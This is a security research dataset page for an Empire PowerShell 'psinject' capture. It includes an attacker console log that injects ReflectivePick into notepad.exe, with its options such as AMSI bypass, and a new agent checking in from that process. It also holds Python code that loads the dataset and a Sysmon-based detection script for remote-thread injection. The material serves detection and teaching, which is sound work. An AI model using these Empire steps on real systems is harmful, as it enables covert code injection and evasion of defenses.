Empire PSInject
Metadata

| Field | Value |
|---|---|
| Contributors | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2019/05/18 |
| Modification Date | 2020/09/20 |
| Tactics | |
| Techniques | |
| Tags | PE Injection, WriteProcessMemory, CreateRemoteThread Execution |
Dataset Description

This dataset represents an adversary reflectively loading/injecting a portable executable (PE) that never touches disk into a remote process: the PE is written into the target with the WriteProcessMemory API and executed via CreateRemoteThread. In the capture below, Empire's psinject module injects ReflectivePick from a PowerShell agent into notepad.exe, and the injected notepad.exe process then checks in as a new agent.
Datasets Downloads

| Type | Link |
|---|---|
| Host | https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip |
Adversary View

```text
[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
 62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http
 F82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6008   5/0.0    2020-08-07 18:31:11  http

(Empire: agents) > interact F82SZKVW
(Empire: F82SZKVW) >
(Empire: F82SZKVW) >
(Empire: F82SZKVW) > usemodule management/psinject
(Empire: powershell/management/psinject) >
(Empire: powershell/management/psinject) > set ProcName notepad
(Empire: powershell/management/psinject) > set Listener http
(Empire: powershell/management/psinject) > info

              Name: Invoke-PSInject
            Module: powershell/management/psinject
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None

Authors:
  @harmj0y
  @sixdub
  leechristensen (@tifkin_)

Description:
  Utilizes Powershell to inject a Stephen Fewer formed
  ReflectivePick which executes PS code from memory in a remote
  process. ProcID or ProcName must be specified.

Comments:
  http://sixdub.net

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        F82SZKVW                  Agent to run module on.
  ProcId           False                                 ProcessID to inject into.
  ProcName         False       notepad                   Process name to inject into.
  Listener         True        http                      Listener to use.
  Obfuscate        False       False                     Switch. Obfuscate the launcher
                                                         powershell code, uses the
                                                         ObfuscateCommand for obfuscation types.
                                                         For powershell only.
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.
                                                         Only used if Obfuscate switch is True.
                                                         For powershell only.
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in
                                                         the stager code.
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in
                                                         the stager code.
  UserAgent        False       default                   User-agent string to use for the staging
                                                         request (default, none, or other).
  Proxy            False       default                   Proxy to use for request (default, none,
                                                         or other).
  ProxyCreds       False       default                   Proxy credentials
                                                         ([domain\]username:password) to use for
                                                         request (default, none, or other).

(Empire: powershell/management/psinject) > execute
[*] Tasked F82SZKVW to run TASK_CMD_JOB
[*] Agent F82SZKVW tasked with task ID 1
[*] Tasked agent F82SZKVW to run module powershell/management/psinject
(Empire: powershell/management/psinject) >
Job started: F48GDZ
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y9RCLV64 checked in
[+] Initial agent Y9RCLV64 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y9RCLV64 at 172.18.39.5

(Empire: powershell/management/psinject) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
 62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http
 F82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6008   5/0.0    2020-08-07 18:32:51  http
 Y9RCLV64 ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       notepad            2576   5/0.0    2020-08-07 18:32:52  http

(Empire: agents) >
```

Note the third agent: it runs inside notepad.exe (PID 2576), the process chosen with `set ProcName notepad`, while the injecting agent F82SZKVW is powershell.exe (PID 6008). That powershell.exe to notepad.exe relationship is what the host telemetry in this dataset records.
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Host dataset (JSON lines, one event per line) packaged as a zip archive
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single JSON file; extract it and keep its path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

Read JSON File

```python
import pandas as pd

# Each line of the file is one event record
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```

Access Security Events

```python
# Count events per log channel (for example Sysmon vs. Security) to see what the dataset contains
df.groupby(['Channel']).size().sort_values(ascending=False)
```
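Once the events are in a DataFrame, the next step a practitioner wants is a query that surfaces the behaviour the description names. The following is an added example, not code from the original page or from the Security-Datasets project. It encodes the technique as Sysmon telemetry: a CreateRemoteThread event (EventID 8) whose source is powershell.exe and whose target is a different image, a preceding ProcessAccess event (EventID 10) whose GrantedAccess includes the rights WriteProcessMemory and CreateRemoteThread need, and a NetworkConnect event (EventID 3) from the injected PID shortly afterwards (the injected notepad.exe checking in to the listener). The sample events are constructed for the example; the field names (`@timestamp`, `Channel`, `EventID`, `SourceImage`, `TargetImage`, `SourceProcessId`, `TargetProcessId`, `GrantedAccess`, `Image`, `ProcessId`, `DestinationIp`, `DestinationPort`) assume the Sysmon naming that the dataset's shipper preserves; check `df.columns` before running it over the real frame with `detect_psinject(df)`.

```python
import pandas as pd

SYSMON = "Microsoft-Windows-Sysmon/Operational"
POWERSHELL = r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"
NOTEPAD = r"c:\windows\system32\notepad.exe"

# Constructed sample events (not rows from the real dataset), shaped like the
# dataset's JSON lines: one dict per event, Sysmon field names preserved.
SAMPLE_EVENTS = [
    # Injector opens a handle to the target with rights sufficient for
    # WriteProcessMemory + CreateRemoteThread (Sysmon 10, ProcessAccess).
    {"@timestamp": "2020-08-07T18:32:40.100Z", "Channel": SYSMON, "EventID": 10,
     "SourceImage": POWERSHELL, "SourceProcessId": 6008,
     "TargetImage": NOTEPAD, "TargetProcessId": 2576, "GrantedAccess": "0x1FFFFF"},
    # Remote thread started in the target (Sysmon 8, CreateRemoteThread).
    {"@timestamp": "2020-08-07T18:32:41.300Z", "Channel": SYSMON, "EventID": 8,
     "SourceImage": POWERSHELL, "SourceProcessId": 6008,
     "TargetImage": NOTEPAD, "TargetProcessId": 2576, "StartAddress": "0x0000000003210000"},
    # The injected notepad.exe beacons out (Sysmon 3, NetworkConnect).
    {"@timestamp": "2020-08-07T18:32:52.000Z", "Channel": SYSMON, "EventID": 3,
     "Image": NOTEPAD, "ProcessId": 2576, "DestinationIp": "192.0.2.10", "DestinationPort": 80},
    # Benign noise: csrss.exe creating a thread in explorer.exe, and a browser connecting out.
    {"@timestamp": "2020-08-07T18:32:45.000Z", "Channel": SYSMON, "EventID": 8,
     "SourceImage": r"c:\windows\system32\csrss.exe", "SourceProcessId": 640,
     "TargetImage": r"c:\windows\explorer.exe", "TargetProcessId": 4120,
     "StartAddress": "0x00007FF9A0B41200"},
    {"@timestamp": "2020-08-07T18:32:50.000Z", "Channel": SYSMON, "EventID": 3,
     "Image": r"c:\program files\mozilla firefox\firefox.exe", "ProcessId": 5100,
     "DestinationIp": "192.0.2.20", "DestinationPort": 443},
]

# Access rights (winnt.h) that WriteProcessMemory + CreateRemoteThread require on the handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def _norm(series):
    """Lower-cased string view of an image-path column; missing values become ''."""
    return series.fillna("").astype(str).str.lower()


def find_remote_thread_injections(df, source_suffix="powershell.exe"):
    """Sysmon EventID 8 where the creating process is PowerShell and the target is another image."""
    ev8 = df[(df["Channel"] == SYSMON) & (df["EventID"] == 8)]
    src, tgt = _norm(ev8["SourceImage"]), _norm(ev8["TargetImage"])
    return ev8[src.str.endswith(source_suffix) & (src != tgt)]


def handle_had_injection_rights(df, inj):
    """True if a Sysmon EventID 10 for the same source/target PIDs granted all INJECTION_RIGHTS."""
    ev10 = df[(df["Channel"] == SYSMON) & (df["EventID"] == 10)]
    ev10 = ev10[(ev10["SourceProcessId"] == inj["SourceProcessId"])
                & (ev10["TargetProcessId"] == inj["TargetProcessId"])]
    rights = ev10["GrantedAccess"].dropna().apply(lambda v: int(str(v), 16))
    return bool(((rights & INJECTION_RIGHTS) == INJECTION_RIGHTS).any())


def correlate_network(df, inj, window_seconds=120):
    """Sysmon EventID 3 from the injected PID/image within window_seconds after the injection."""
    ev3 = df[(df["Channel"] == SYSMON) & (df["EventID"] == 3)]
    if ev3.empty:
        return ev3
    ts = pd.to_datetime(ev3["@timestamp"], utc=True)
    t0 = pd.to_datetime(inj["@timestamp"], utc=True)
    mask = ((ev3["ProcessId"] == inj["TargetProcessId"])
            & (_norm(ev3["Image"]) == str(inj["TargetImage"]).lower())
            & (ts >= t0) & (ts <= t0 + pd.Timedelta(seconds=window_seconds)))
    return ev3[mask]


def detect_psinject(events):
    """Return one alert per PowerShell remote-thread injection, enriched with handle rights and beacons."""
    df = events if isinstance(events, pd.DataFrame) else pd.DataFrame(events)
    alerts = []
    for _, inj in find_remote_thread_injections(df).iterrows():
        net = correlate_network(df, inj)
        alerts.append({
            "source_image": inj["SourceImage"],
            "source_pid": int(inj["SourceProcessId"]),
            "target_image": inj["TargetImage"],
            "target_pid": int(inj["TargetProcessId"]),
            "handle_rights_ok": handle_had_injection_rights(df, inj),
            "beacons": net.reindex(columns=["DestinationIp", "DestinationPort"]).to_dict("records"),
            # An injected process that then talks to the network is the strongest signal here.
            "severity": "high" if len(net) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_psinject(SAMPLE_EVENTS):
        print(alert)
```

The EventID 8 filter alone will also catch legitimate remote-thread creation (csrss.exe, debuggers, some security tools), which is why the example keeps that stage as a candidate and raises severity only when the injected PID goes on to make a network connection; widen `source_suffix` or the time window to taste.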